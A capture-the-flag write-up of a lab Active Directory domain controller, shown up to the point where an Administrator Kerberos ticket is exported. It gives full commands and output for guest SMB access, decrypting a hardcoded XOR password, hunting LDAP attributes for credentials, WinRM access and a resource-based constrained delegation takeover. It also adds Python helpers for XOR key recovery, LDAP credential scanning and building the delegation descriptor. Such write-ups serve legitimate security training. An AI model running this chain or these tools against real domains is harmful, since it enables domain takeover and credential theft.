Overview
The box starts with SMB guest access that exposes a support-tools share containing a suspicious .NET binary. Decompiling it reveals hardcoded LDAP credentials, obfuscated with a repeating XOR key, which we recover to authenticate as the ldap user. Raw LDAP enumeration then finds a plaintext password in the info attribute of the support user, which gives us WinRM access. BloodHound shows that support is a member of Shared Support Accounts, a group holding GenericAll over the DC computer object, so we create a machine account, configure resource-based constrained delegation (RBCD) on DC$ and use S4U2Proxy to impersonate Administrator, ending with a shell as SYSTEM.
Enumeration
Start with an nmap scan.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support]
└──╼ [★]$ nmap -sC -sV -vv -oA init 10.129.230.181 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-06-15 12:07 PDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:07
Completed NSE at 12:07, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:07
Completed NSE at 12:07, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:07
Completed NSE at 12:07, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 12:07
Completed Parallel DNS resolution of 1 host. at 12:07, 0.17s elapsed
Initiating Connect Scan at 12:07
Scanning 10.129.230.181 [1000 ports]
Discovered open port 53/tcp on 10.129.230.181
Discovered open port 445/tcp on 10.129.230.181
Discovered open port 139/tcp on 10.129.230.181
Discovered open port 135/tcp on 10.129.230.181
Discovered open port 3269/tcp on 10.129.230.181
Discovered open port 3268/tcp on 10.129.230.181
Discovered open port 636/tcp on 10.129.230.181
Discovered open port 464/tcp on 10.129.230.181
Discovered open port 389/tcp on 10.129.230.181
Discovered open port 593/tcp on 10.129.230.181
Discovered open port 88/tcp on 10.129.230.181
Completed Connect Scan at 12:08, 41.91s elapsed (1000 total ports)
Initiating Service scan at 12:08
Scanning 11 services on 10.129.230.181
Completed Service scan at 12:09, 25.76s elapsed (11 services on 1 host)
NSE: Script scanning 10.129.230.181.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:09
NSE Timing: About 99.93% done; ETC: 12:09 (0:00:00 remaining)
Completed NSE at 12:09, 40.16s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:09
Completed NSE at 12:09, 5.38s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:09
Completed NSE at 12:09, 0.00s elapsed
Nmap scan report for 10.129.230.181
Host is up, received user-set (0.33s latency).
Scanned at 2026-06-15 12:07:55 PDT for 113s
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2026-06-15 19:08:45Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 17243/tcp): CLEAN (Timeout)
| Check 2 (port 29689/tcp): CLEAN (Timeout)
| Check 3 (port 26300/udp): CLEAN (Timeout)
| Check 4 (port 47439/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 0s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-06-15T19:09:06
|_ start_date: N/A
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:09
Completed NSE at 12:09, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:09
Completed NSE at 12:09, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:09
Completed NSE at 12:09, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.83 seconds
We got DNS, Kerberos, RPC, LDAP, kpasswd, SMB and the other usual Active Directory ports, so this is a domain controller.
The domain name is support.htb and the host is DC, so the FQDN is DC.support.htb.
There is no clock skew (Kerberos rejects tickets when our clock differs from the DC by more than five minutes, so this matters later for the delegation attack), so let's fix the hosts file and start enumeration.
hosts file
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support]
└──╼ [★]$ echo '10.129.230.181 DC DC.support.htb support.htb' | sudo tee -a /etc/hosts
10.129.230.181 DC DC.support.htb support.htb
support-tools share
The Guest account is enabled (nxc also reports that null authentication works), and Guest can read a non-standard share called support-tools.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support]
└──╼ [★]$ nxc smb support.htb -u 'Guest' -p '' --shares
SMB 10.129.230.181 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.230.181 445 DC [+] support.htb\Guest:
SMB 10.129.230.181 445 DC [*] Enumerated shares
SMB 10.129.230.181 445 DC Share Permissions Remark
SMB 10.129.230.181 445 DC ----- ----------- ------
SMB 10.129.230.181 445 DC ADMIN$ Remote Admin
SMB 10.129.230.181 445 DC C$ Default share
SMB 10.129.230.181 445 DC IPC$ READ Remote IPC
SMB 10.129.230.181 445 DC NETLOGON Logon server share
SMB 10.129.230.181 445 DC support-tools READ support staff tools
SMB 10.129.230.181 445 DC SYSVOL Logon server share
Listing the share shows well-known, legitimate tools: 7-Zip, PuTTY for remote connections, npp (Notepad++), the Sysinternals suite, WinDirStat and Wireshark. UserInfo.exe.zip is the odd one out, so let's download it.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support]
└──╼ [★]$ smbclient //support.htb/support-tools -U'Guest'%''
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jul 20 10:01:06 2022
.. D 0 Sat May 28 04:18:25 2022
7-ZipPortable_21.07.paf.exe A 2880728 Sat May 28 04:19:19 2022
npp.8.4.1.portable.x64.zip A 5439245 Sat May 28 04:19:55 2022
putty.exe A 1273576 Sat May 28 04:20:06 2022
SysinternalsSuite.zip A 48102161 Sat May 28 04:19:31 2022
UserInfo.exe.zip A 277499 Wed Jul 20 10:01:07 2022
windirstat1_1_2_setup.exe A 79171 Sat May 28 04:20:17 2022
WiresharkPortable64_3.6.5.paf.exe A 44398000 Sat May 28 04:19:43 2022
The zip contains the UserInfo.exe binary, its .config file and the DLLs it depends on, so let's decompile the executable.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support]
└──╼ [★]$ unzip -l UserInfo.exe.zip
Archive: UserInfo.exe.zip
Length Date Time Name
--------- ---------- ----- ----
12288 2022-05-27 10:51 UserInfo.exe
99840 2022-03-01 10:18 CommandLineParser.dll
22144 2021-10-22 16:42 Microsoft.Bcl.AsyncInterfaces.dll
47216 2021-10-22 16:48 Microsoft.Extensions.DependencyInjection.Abstractions.dll
84608 2021-10-22 16:48 Microsoft.Extensions.DependencyInjection.dll
64112 2021-10-22 16:51 Microsoft.Extensions.Logging.Abstractions.dll
20856 2020-02-19 02:05 System.Buffers.dll
141184 2020-02-19 02:05 System.Memory.dll
115856 2018-05-15 06:29 System.Numerics.Vectors.dll
18024 2021-10-22 16:40 System.Runtime.CompilerServices.Unsafe.dll
25984 2020-02-19 02:05 System.Threading.Tasks.Extensions.dll
563 2022-05-27 09:59 UserInfo.exe.config
--------- -------
652675 12 files
I like dotPeek the most, not gonna lie, but it isn't worth spinning up a Windows instance just for an easy box, so I will just use ILSpy.
Decompiling the code shows this LdapQuery class, so there must be credentials in here to authenticate for the query.

The constructor shows that the account used for the LDAP bind is support\ldap, authenticating with AuthenticationTypes value 1 (Secure, i.e. Negotiate), and that it calls Protected.getPassword() for the password.
public LdapQuery()
{
//IL_0018: Unknown result type (might be due to invalid IL or missing references)
//IL_0022: Expected O, but got Unknown
//IL_0035: Unknown result type (might be due to invalid IL or missing references)
//IL_003f: Expected O, but got Unknown
string password = Protected.getPassword();
entry = new DirectoryEntry("LDAP://support.htb", "support\\ldap", password);
entry.set_AuthenticationType((AuthenticationTypes)1);
ds = new DirectorySearcher(entry);
}
Here is getPassword, which decodes the enc_password field: base64-decode it, then XOR each byte with the repeating key and with the constant 0xDF.
public static string getPassword()
{
byte[] array = Convert.FromBase64String(enc_password);
byte[] array2 = array;
for (int i = 0; i < array.Length; i++)
{
array2[i] = (byte)((uint)(array[i] ^ key[i % key.Length]) ^ 0xDFu);
}
return Encoding.Default.GetString(array2);
}
And here are the encoded password and the key used for the decryption:
using System.Text;
private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";
private static byte[] key = Encoding.ASCII.GetBytes("armando");
So let's decrypt it with the same algorithm as getPassword, reimplemented in Python.
Here is my code for the decryption, nothing special, it is the same as the C# code.
Encoding.Default in .NET Framework is the system ANSI code page, which is cp1252 on a Western Windows install, so decoding the byte array as cp1252 reproduces what the binary does; since the result turns out to be plain ASCII, latin-1 would give the same string.
import base64

# values copied from the decompiled Protected class
enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = b"armando"

# Convert.FromBase64String(enc_password)
array = bytearray(base64.b64decode(enc_password))
# array2[i] = (byte)((array[i] ^ key[i % key.Length]) ^ 0xDF)
for i in range(len(array)):
    array[i] = (array[i] ^ key[i % len(key)]) ^ 0xDF
# Encoding.Default.GetString() -> cp1252 on a Western Windows host
decrypted_password = array.decode("cp1252")
print(f"Decrypted password: {decrypted_password}")
Running the script gives us the password:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support/UserInfo]
└──╼ [★]$ python3 decrypt.py
Decrypted password: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
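The scheme is worth a second look, because the extra ^ 0xDF adds nothing: XOR with a repeating key followed by XOR with a constant is just XOR with a different repeating key, and a single known plaintext recovers that key. The script below is an added example, not code from the page or from UserInfo.exe. It reuses the enc_password and key lifted from the binary, adds the inverse direction for a roundtrip check, shows the constant folding into the key, and recovers the 7-byte key from the ciphertext and the recovered password alone, the way you would if you had the blob and one known password but not the binary.

```python
import base64

# Values lifted from the decompiled Protected class of UserInfo.exe.
ENC_PASSWORD = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
KEY = b"armando"
CONST = 0xDF


def xor_stream(data: bytes, key: bytes, const: int = CONST) -> bytes:
    """The getPassword() transform: byte ^ key[i % len(key)] ^ const.
    XOR is its own inverse, so one function both encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] ^ const for i, b in enumerate(data))


def decrypt(enc_b64: str, key: bytes = KEY) -> str:
    # Encoding.Default on a Western Windows host is cp1252.
    return xor_stream(base64.b64decode(enc_b64), key).decode("cp1252")


def encrypt(plain: str, key: bytes = KEY) -> str:
    """Inverse of decrypt(); lets us verify we reproduced the scheme exactly."""
    return base64.b64encode(xor_stream(plain.encode("cp1252"), key)).decode()


def effective_key(key: bytes, const: int = CONST) -> bytes:
    """The '^ 0xDF' is not a second layer: cipher ^ key ^ const == cipher ^ (key ^ const),
    so the real keystream is this folded key, repeated."""
    return bytes(k ^ const for k in key)


def recover_key(enc_b64: str, known_plain: str, const: int = CONST) -> bytes:
    """Known-plaintext attack on repeating-key XOR.
    keystream = cipher ^ plain; the shortest period that holds across the whole
    message is the key length (a period must repeat at least twice to count).
    Returns the original key with the constant un-folded, or b'' if nothing fits."""
    cipher = base64.b64decode(enc_b64)
    plain = known_plain.encode("cp1252")
    stream = bytes(c ^ p for c, p in zip(cipher, plain))
    for period in range(1, len(stream) // 2 + 1):
        if all(stream[i] == stream[i % period] for i in range(len(stream))):
            return bytes(s ^ const for s in stream[:period])
    return b""


if __name__ == "__main__":
    pw = decrypt(ENC_PASSWORD)
    print("password :", pw)
    print("roundtrip:", encrypt(pw) == ENC_PASSWORD)
    print("eff. key :", effective_key(KEY).hex())
    print("recovered:", recover_key(ENC_PASSWORD, pw))
```

The practical point: a "decryption" routine whose key ships inside the same binary is obfuscation, and even without the binary a single leaked password plus the stored blob gives the key for every other secret protected the same way.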
LDAP user
As you can see, the LDAP bind with the recovered password succeeds:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support/UserInfo]
└──╼ [★]$ nxc ldap support.htb -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
LDAP 10.129.230.181 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:support.htb) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.230.181 389 DC [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
First, get a list of users, because we'll need it:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support/UserInfo]
└──╼ [★]$ nxc ldap support.htb -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --users-export users.txt
LDAP 10.129.230.181 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:support.htb) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.230.181 389 DC [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
LDAP 10.129.230.181 389 DC [*] Enumerated 20 domain users: support.htb
LDAP 10.129.230.181 389 DC -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.129.230.181 389 DC Administrator 2022-07-19 10:55:56 0 Built-in account for administering the computer/domain
LDAP 10.129.230.181 389 DC Guest 2022-05-28 04:18:55 0 Built-in account for guest access to the computer/domain
LDAP 10.129.230.181 389 DC krbtgt 2022-05-28 04:03:43 0 Key Distribution Center Service Account
LDAP 10.129.230.181 389 DC ldap 2022-05-28 04:11:46 0
LDAP 10.129.230.181 389 DC support 2022-05-28 04:12:00 0
LDAP 10.129.230.181 389 DC smith.rosario 2022-05-28 04:12:19 0
LDAP 10.129.230.181 389 DC hernandez.stanley 2022-05-28 04:12:34 0
LDAP 10.129.230.181 389 DC wilson.shelby 2022-05-28 04:12:50 0
LDAP 10.129.230.181 389 DC anderson.damian 2022-05-28 04:13:05 0
LDAP 10.129.230.181 389 DC thomas.raphael 2022-05-28 04:13:21 0
LDAP 10.129.230.181 389 DC levine.leopoldo 2022-05-28 04:13:37 0
LDAP 10.129.230.181 389 DC raven.clifton 2022-05-28 04:13:53 0
LDAP 10.129.230.181 389 DC bardot.mary 2022-05-28 04:14:08 0
LDAP 10.129.230.181 389 DC cromwell.gerard 2022-05-28 04:14:24 0
LDAP 10.129.230.181 389 DC monroe.david 2022-05-28 04:14:39 0
LDAP 10.129.230.181 389 DC west.laura 2022-05-28 04:14:55 0
LDAP 10.129.230.181 389 DC langley.lucy 2022-05-28 04:15:10 0
LDAP 10.129.230.181 389 DC daughtler.mabel 2022-05-28 04:15:26 0
LDAP 10.129.230.181 389 DC stoll.rachelle 2022-05-28 04:15:42 0
LDAP 10.129.230.181 389 DC ford.victoria 2022-05-28 04:15:58 0
LDAP 10.129.230.181 389 DC [*] Writing 20 local users to users.txt
I used that list for three things. First was password spraying, because I thought whoever created this ldap account might have reused their own password; then I tried Kerberoasting and AS-REP roasting, but nothing worked, so I went back to raw LDAP queries for these users, since we might find a password in any of their attributes.
When I say raw queries, of course I mean my ldaphunt.
Running my script, we get a possible password for the user support in its info attribute, so let's see if we can access anything with it.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support/UserInfo]
└──╼ [★]$ python3 ldaphunt.py -H 10.129.230.181 -d support.htb -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
██╗ ██████╗ █████╗ ██████╗ ██╗ ██╗██╗ ██╗███╗ ██╗████████╗
██║ ██╔══██╗██╔══██╗██╔══██╗██║ ██║██║ ██║████╗ ██║╚══██╔══╝
██║ ██║ ██║███████║██████╔╝███████║██║ ██║██╔██╗ ██║ ██║
██║ ██║ ██║██╔══██║██╔═══╝ ██╔══██║██║ ██║██║╚██╗██║ ██║
███████╗██████╔╝██║ ██║██║ ██║ ██║╚██████╔╝██║ ╚████║ ██║
╚══════╝╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═╝
AD Credential Hunter | @jimmex
[*] Connecting to 10.129.230.181 as support.htb\ldap...
[+] Bound successfully!
[*] Enumerating users in DC=support,DC=htb...
[*] Found 21 user objects
[*] Scanning ALL attributes for credential patterns...
----------------------------------------------------------------------
[+] Administrator
description [info:always-show]
→ Built-in account for administering the computer/domain
[+] Guest
description [info:always-show]
→ Built-in account for guest access to the computer/domain
[+] DC$
servicePrincipalName [possible:complex-string]
→ Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/dc.support.htb
servicePrincipalName [possible:complex-string]
→ E3514235-4B06-11D1-AB04-00C04FC2DCD2/290156e5-22cb-4f1b-9b96-5516d84c363c/support.htb
[+] krbtgt
description [info:always-show]
→ Key Distribution Center Service Account
[+] support
info [info:always-show]
→ Ironside47pleasure40Watchful
----------------------------------------------------------------------
[*] Done. 5 users with potential credential data out of 21 total.
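The idea behind the attribute hunt above is the same regardless of tooling: pull every user object, then look at the free-text attributes (description, info, comment and similar) for values that either sit next to a password keyword or simply look like a password. The script below is an added example of that scanning logic, not the author's ldaphunt. It runs offline over a constructed list of entries shaped like what an LDAP search returns: the Administrator and support values mirror the real output above, while svc_backup, helpdesk and their attribute values are made up to exercise the keyword path and the negative cases.

```python
import re
from typing import Dict, List, Tuple

# Free-text attributes that, in real directories, end up holding passwords.
FREE_TEXT_ATTRS = ("description", "info", "comment", "title",
                   "physicalDeliveryOfficeName", "userPassword", "unixUserPassword")

# "password: X", "pwd=X", "pass X" embedded in a longer sentence.
KEYWORD_RE = re.compile(r"(?i)\b(?:pass(?:word|wd)?|pwd|cred(?:ential)?s?)\b\s*[:=]?\s*(\S{4,})")

# Character classes a standalone value must draw on to count as "complex".
CLASSES = (str.islower, str.isupper, str.isdigit, lambda c: not c.isalnum())


def looks_like_password(value: str) -> bool:
    """One whitespace-free token, 8+ chars, using at least three of the four classes.
    Plain words ('Engineer') and sentences ('Built-in account for ...') fail this."""
    v = value.strip()
    if len(v) < 8 or any(ch.isspace() for ch in v):
        return False
    return sum(any(f(ch) for ch in v) for f in CLASSES) >= 3


def hunt(entries: List[Dict[str, object]]) -> List[Tuple[str, str, str, str]]:
    """Return (sAMAccountName, attribute, candidate, reason) for every suspicious value."""
    hits = []
    for entry in entries:
        sam = str(entry.get("sAMAccountName", "?"))
        for attr in FREE_TEXT_ATTRS:
            raw = entry.get(attr)
            if not raw:
                continue
            for value in (raw if isinstance(raw, list) else [raw]):  # LDAP attributes are multi-valued
                value = str(value)
                m = KEYWORD_RE.search(value)
                if m:
                    hits.append((sam, attr, m.group(1), "keyword"))
                elif looks_like_password(value):
                    hits.append((sam, attr, value, "complex-string"))
    return hits


# Constructed entries: Administrator and support mirror the real output above,
# svc_backup and helpdesk are made up to exercise the other code paths.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "Administrator",
     "description": ["Built-in account for administering the computer/domain"]},
    {"sAMAccountName": "support", "info": ["Ironside47pleasure40Watchful"]},
    {"sAMAccountName": "svc_backup", "description": ["Backup service. pwd: Summer2024!"]},
    {"sAMAccountName": "helpdesk", "description": ["Help desk"], "title": ["Engineer"]},
]

if __name__ == "__main__":
    for sam, attr, value, reason in hunt(SAMPLE_ENTRIES):
        print(f"[+] {sam:<15} {attr:<12} [{reason}] -> {value}")
```

Against a live directory you would fill the entry list from a search with filter (objectClass=user) requesting these attributes, which any authenticated account can read by default; that default readability is exactly why a password in the info field is a finding even when the account itself is unprivileged.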
Shell as Support
And as you can see, this user can WinRM to the box:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support/UserInfo]
└──╼ [★]$ nxc winrm support.htb -u support -p 'Ironside47pleasure40Watchful'
WINRM 10.129.230.181 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:support.htb)
WINRM 10.129.230.181 5985 DC [+] support.htb\support:Ironside47pleasure40Watchful (Pwn3d!)
And we get the user flag:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support/UserInfo]
└──╼ [★]$ evil-winrm -i support.htb -u support -p 'Ironside47pleasure40Watchful'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\support\Documents> type ../desktop/user.txt
b06ace37b388bb3ade6c5dba17050eb0
Collect data for BloodHound:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support]
└──╼ [★]$ rusthound -i 10.129.230.181 -u support -p 'Ironside47pleasure40Watchful' -z -d support.htb
---------------------------------------------------
Initializing RustHound at 13:16:25 on 06/15/26
Powered by g0h4n from OpenCyber
---------------------------------------------------
[2026-06-15T20:16:25Z INFO rusthound] Verbosity level: Info
[2026-06-15T20:16:25Z INFO rusthound::ldap] Connected to SUPPORT.HTB Active Directory!
[2026-06-15T20:16:25Z INFO rusthound::ldap] Starting data collection...
[2026-06-15T20:16:26Z INFO rusthound::ldap] All data collected for NamingContext DC=support,DC=htb
[2026-06-15T20:16:26Z INFO rusthound::json::parser] Starting the LDAP objects parsing...
[2026-06-15T20:16:26Z INFO rusthound::json::parser::bh_41] MachineAccountQuota: 10
[2026-06-15T20:16:27Z INFO rusthound::json::parser] Parsing LDAP objects finished!
[2026-06-15T20:16:27Z INFO rusthound::json::checker] Starting checker to replace some values...
[2026-06-15T20:16:27Z INFO rusthound::json::checker] Checking and replacing some values finished!
[2026-06-15T20:16:27Z INFO rusthound::json::maker] 21 users parsed!
[2026-06-15T20:16:27Z INFO rusthound::json::maker] 61 groups parsed!
[2026-06-15T20:16:27Z INFO rusthound::json::maker] 1 computers parsed!
[2026-06-15T20:16:27Z INFO rusthound::json::maker] 1 ous parsed!
[2026-06-15T20:16:27Z INFO rusthound::json::maker] 1 domains parsed!
[2026-06-15T20:16:27Z INFO rusthound::json::maker] 2 gpos parsed!
[2026-06-15T20:16:27Z INFO rusthound::json::maker] 21 containers parsed!
[2026-06-15T20:16:27Z INFO rusthound::json::maker] .//20260615131627_support-htb_rusthound.zip created!
RustHound Enumeration Completed at 13:16:27 on 06/15/26! Happy Graphing!
Looking at the BloodHound data, the user support is a member of the Shared Support Accounts group, which has GenericAll over the DC computer object. GenericAll lets us write msDS-AllowedToActOnBehalfOfOtherIdentity on DC$, and the RustHound output above shows MachineAccountQuota is still 10, so we can create our own computer account and abuse resource-based constrained delegation (the AllowedToAct edge).

Shell as SYSTEM
First, add a computer account to the domain (allowed for any authenticated user while MachineAccountQuota is above 0):
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support]
└──╼ [★]$ addcomputer.py -method SAMR -computer-name attack$ -computer-pass 'Password123!' -dc-host 10.129.230.181 -domain-netbios support.htb 'support.htb/support:Ironside47pleasure40Watchful'
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account attack$ with password Password123!.
Then configure RBCD: allow attack$ to act on behalf of other identities against DC$. This writes the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of DC$, which is what the GenericAll right gives us:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support]
└──╼ [★]$ rbcd.py -delegate-from attack$ -delegate-to DC$ -action write support.htb/support:Ironside47pleasure40Watchful
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] attack$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] attack$ (S-1-5-21-1677581083-3380853377-188903654-6101)
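What rbcd.py -action write actually stores in msDS-AllowedToActOnBehalfOfOtherIdentity is a self-relative security descriptor (MS-DTYP layout) whose DACL holds one access-allowed ACE per account permitted to delegate, carrying that account's SID. The script below is an added example that builds and parses such a descriptor in pure Python with struct, with no impacket dependency; it is not impacket's code, but it mirrors what rbcd.py writes: owner BUILTIN\Administrators, control SE_SELF_RELATIVE|SE_DACL_PRESENT and the CCDCLCSWRPWPDTLOCRSDRCWDWO mask (0xF01FF). The attack$ SID comes from the output above. add_rbcd_sid() handles both cases rbcd.py distinguishes: an empty attribute, and an attribute that already lists other accounts, which must be preserved rather than overwritten.

```python
import struct
from typing import List, Optional

# Flags and constants from MS-DTYP; values match what impacket's rbcd.py writes.
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACL_REVISION_DS = 4
ACCESS_ALLOWED_ACE_TYPE = 0x00
FULL_CONTROL_MASK = 0x000F01FF          # SDDL CCDCLCSWRPWPDTLOCRSDRCWDWO
BUILTIN_ADMINS = "S-1-5-32-544"         # owner rbcd.py sets (O:BA)

# SID of attack$ as reported by rbcd.py above.
ATTACK_SID = "S-1-5-21-1677581083-3380853377-188903654-6101"


def sid_to_bytes(sid: str) -> bytes:
    """Textual SID -> binary: revision, sub-authority count, 48-bit big-endian
    identifier authority, then 32-bit little-endian sub-authorities."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("not a SID: %r" % sid)
    subs = [int(p) for p in parts[3:]]
    return bytes([1, len(subs)]) + int(parts[2]).to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)


def bytes_to_sid(buf: bytes, off: int = 0) -> str:
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(str(s) for s in subs))


def build_rbcd_sd(sids: List[str]) -> bytes:
    """Self-relative SD: 20-byte header, owner SID, then a DACL with one
    ACCESS_ALLOWED_ACE (full-control mask) per delegating account. No group, no SACL."""
    aces = b"".join(
        struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), FULL_CONTROL_MASK) + sid_b
        for sid_b in map(sid_to_bytes, sids))
    acl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces), len(sids), 0) + aces
    owner = sid_to_bytes(BUILTIN_ADMINS)
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         20, 0, 0, 20 + len(owner))   # offsets: owner, group, sacl, dacl
    return header + owner + acl


def read_rbcd_sids(sd: Optional[bytes]) -> List[str]:
    """SIDs granted in the DACL, or [] for an absent/empty attribute (rbcd.py's 'is empty')."""
    if not sd:
        return []
    rev, _, control, _, _, _, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1 or not (control & SE_DACL_PRESENT) or dacl_off == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, dacl_off)
    off, sids = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size, _ = struct.unpack_from("<BBHI", sd, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(bytes_to_sid(sd, off + 8))
        off += ace_size
    return sids


def add_rbcd_sid(current: Optional[bytes], new_sid: str) -> bytes:
    """Append new_sid while keeping every account already allowed to act on behalf of the target."""
    existing = read_rbcd_sids(current)
    if new_sid in existing:
        return current
    return build_rbcd_sd(existing + [new_sid])


if __name__ == "__main__":
    sd = add_rbcd_sid(None, ATTACK_SID)
    print(len(sd), "bytes:", sd.hex())
    print("allowed to act on behalf of DC$:", read_rbcd_sids(sd))
```

On a live target you would read the attribute with an LDAP search (or rbcd.py -action read), feed the raw bytes to add_rbcd_sid() and write the result back with an LDAP modify; clearing the attribute, or rbcd.py -action remove, undoes it. Reading it first is also the defender's check: any SID in that DACL that does not belong to a known front-end service is a delegation backdoor.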
Then ask for a service ticket to cifs/DC.support.htb impersonating Administrator. getST.py first performs S4U2Self, obtaining a ticket for Administrator to attack$ itself, then S4U2Proxy, which the DC accepts because DC$ now lists attack$ in msDS-AllowedToActOnBehalfOfOtherIdentity; this works because Administrator is not marked sensitive or in Protected Users:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support]
└──╼ [★]$ getST.py -spn cifs/DC.support.htb -impersonate administrator support.htb/attack$:'Password123!'
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_DC.support.htb@SUPPORT.HTB.ccache
Now point KRB5CCNAME at the ticket:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support]
└──╼ [★]$ export KRB5CCNAME=administrator@cifs_DC.support.htb@SUPPORT.HTB.ccache
